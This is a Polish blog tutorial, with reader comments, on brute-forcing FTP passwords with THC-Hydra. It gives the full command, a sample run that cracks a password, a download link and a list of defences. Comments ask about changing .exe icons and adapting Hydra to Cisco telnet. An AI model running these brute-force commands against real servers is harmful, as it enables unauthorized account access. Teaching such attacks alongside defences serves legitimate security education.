Jak włamać się do ftp? A raczej jak odzyskać hasło! Kolejny z cyklu short wpisów. Tym razem dowiemy się jak możemy odzyskać hasło do serwera za pomocą THC-Hydra (atak słownikowy). Skuteczność metody zależy od konfiguracji serwera, główną bolączką może być banowanie IP osoby próbującej się zalogować zbyt wiele razy lub ustawiony długi czas oczekiwania pomiędzy logowaniami. Metoda na pewno jest wydajniejsza niż ręczne wpisywania hasła.
Jeżeli nie masz pojęcia na czym polega ten atak i jak uruchomić Hydre to zapraszamy do jednego z poprzednich wpisów, w którym znajduje się również film w polskiej wersji językowej pt. „Łamanie hasła routera”.
Jak włamac sie do ftp? – praktyka
Przejdźmy od razu do próby odzyskania hasła do serwera FTP.
- Wykonujemy pierwsze 10 kroków z wpisu „Łamanie hasła routera?” z sekcji o nazwie „Zaczynamy nr 1!„.
- Teraz wydajemy polecenie (Hydra dla Windows nieco dalej w wpisie do pobrania):
hydra.exe -l hakerLogin -P imiona.txt -t25 192.168.0.102 ftp
Wyjaśnienie:
- hydra.exe – nazwa uruchamianego programu
- -l hakerLogin – login do serwera ftp
- -P imiona.txt – zbiór potencjalnych haseł do serwera ftp w słowniku
- -t 25 – ilość wątków w systemie (może wielowątkowość czasem przyspieszać proces ataku)
- 192.168.0.102 – adres IP/domena pod którym znajduje się serwer plików FTP
- ftp – atak na usługe ftp
Przykładowy przebieg ataku wygląda następująco:
C:\Users\HakeEduPL\Desktop\THC-Hydra_Windows>hydra.exe -l hakerLogin -P imiona.txt -t25 192.168.0.102 ftp
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent
overwriting, you have 10 seconds to abort...
Hydra v6.0 (c) 2011 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2013-10-04 13:05:09
[DATA] 25 tasks, 1 servers, 2720 login tries (l:1/p:2720), ~108 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 200.00 tries/min, 200 tries in 00:01h, 2520 todo in 00:13h
[STATUS] 150.00 tries/min, 450 tries in 00:03h, 2270 todo in 00:16h
[STATUS] 125.00 tries/min, 875 tries in 00:07h, 1845 todo in 00:15h
[STATUS] 121.75 tries/min, 1461 tries in 00:12h, 1259 todo in 00:11h
[21][ftp] host: 192.168.0.102 login: hakerLogin password: haselko
[STATUS] attack finished for 192.168.0.102 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2013-10-04 13:21:25
C:\Users\HakeEduPL\Desktop\THC-Hydra_Windows>
Warto zwrócić uwagę na pojawiającą się informacje typu [STATUS] z takimi danymi jak ilość zbadanych haseł na sekundę (tries/min) jak i ilość przebadanych haseł w odpowiedniej jednostce czasu.
>> THC-Hydra – wersja dla Windows [POBIERZ TUTAJ] <<
W każdym za pomocą ctrl+c możemy przerwać atak słownikowy w celu kontynuowania go w przyszłości, wystarczy wpisać:
hydra.exe -R
Niestety „odzyskiwanie hasła” jest uzależnione od ustawionego tzn. login timeout, czyli czasu który jest wymagany do możliwego ponownego logowania na dane konto.
Jako ciekawostkę dodam że istnieje również graficzna wersja (x)Hydry:
Obrona przed tego typami atakmi brute-force na ftp
- Zmianie domyślnych portów ftp (21 na inny) w celu zamaskowania usługi.
- Ograniczeniu w konfiguracji liczby wątków na serwerze w celu ograniczenia obsługiwania wielu prób logowania naraz, bądź ograniczenie liczby maksymalnej użykowników.
- Ustawienie wysokich czasów różnych parametrów z rodziny timeout w celu ograniczenia szybkości tego ataku a zarazem obniżając skutecznie ich powodzenie.
- Włączenie autobanowania adresów IP, na daną jednostke czasu, w razie niepowodzenia n razy logowania.
- Włączenie i przeglądanie logów, w celu weryfikacji podejrzanych masowych logowań.
Jeśli to czytasz może zainteresuje Cię jeszcze:
Pozdrawiamy! 🙂
Więcej takich filmów ; )
Staram się, ale czasu mam niestety mało. Tematy nie będą bardzo bardzo zaawansowane (stąd domena edu.pl), ponieważ chce się tylko rozprawić z ciągłymi pytaniami na forach i w sieci o hakowaniu „wszystkiego”.
Cześć mam prośbę , możesz zrobić poradnik jak zmieniać ikony plików exe,bat itd… głównie o (pliki .EXE) się rozchodzi.
Sprawdzałem kilka programów ale coś nie działają albo linki już wygasły.
Jak byś miał czas i chęci ; )
PS: Wyczytałem , że można to zrobić bez programów ale nie mam pojęcia jak.
Tak, mam mniej czasu ale zrobię taki wpis. Poinformuje Cię mailem jak coś naskrobię. To prawda, nie trzeba specjalistycznych programów do zmiany ikony (lecz jakieś tam wypadało by mieć). Wystarczy tzn. edytor zasobów. Otwiera się nim plik i podmienia ikonkę. Pozdrawiam.
Cześć, czy mógłbyś zrobić poradnik, jak znaleźć login do konta ftp? 😉
W ten sam sposób. Jednak złożoność wtedy kombinacji login+hasło sprawia, że konto staje się prawdziwą twierdzą nie do zdobycia.
A co stanie się gdy dam bardzo duży plik słownika? Program zatrzyma się po trafieniu hasła czy będzie sprawdzał wszystkie do końca??
Tak, Hydra zakończy się zaraz po odnalezieniu hasła w domyślnej konfiguracji. Może się zdarzyć, że przejrzy dodatkowych kilka haseł ponieważ musi zahamować swoje wątki działające w tle.
Program nie włącza sie prosze o pomoc
Czy można spośród protokołów hydry wybrać taki, który odpowiadałby założeniom:
1. protokół telnet na niestandardowym porcie
2. brak loginu, od razu monit o hasło
3. po podaniu nieprawidłowego hasła od razu zrywa połączenie bez żadnego komunikatu
Próbowałem z opcją telnet, ale wymaga loginu i cisco, a ta z kolei wszystkie hasła ze słownika oznacza jako prawidłowe. Być może pozostaje zmodyfikować któryś z plików źródłowych hydry obsługujących dany protokół tak aby odpowiadał założeniom.